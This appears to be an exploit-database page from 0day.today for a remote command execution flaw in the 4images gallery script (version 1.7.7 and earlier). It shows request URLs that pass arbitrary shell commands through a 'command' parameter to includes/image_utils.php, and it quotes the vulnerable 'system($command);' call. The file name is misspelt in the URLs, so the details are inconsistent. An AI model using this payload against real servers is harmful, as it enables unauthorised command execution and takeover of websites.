[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

4images <= 1.7.7 (image_utils.php) Remote Command Execution

Author
n/a
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12218
Category
web applications
Date add
12-05-2010
Platform
php
=========================================================================
4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability
=========================================================================


# [+] Script :4images #
# [+] Download:http://www.4homepages.de/downloads/e0adbeb40435/4images1.7.7.zip
# Version: [1.7.7] #
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : includes/image_utils.php
 
http://localhost/includes/iamge_utils.php?command=[your command]
 
http://127.0.0.1/includes/iamge_utils.php?command=[your command]
 
 
 system($command);
 
line : 104 and 125 



#  0day.today [2024-12-25]  #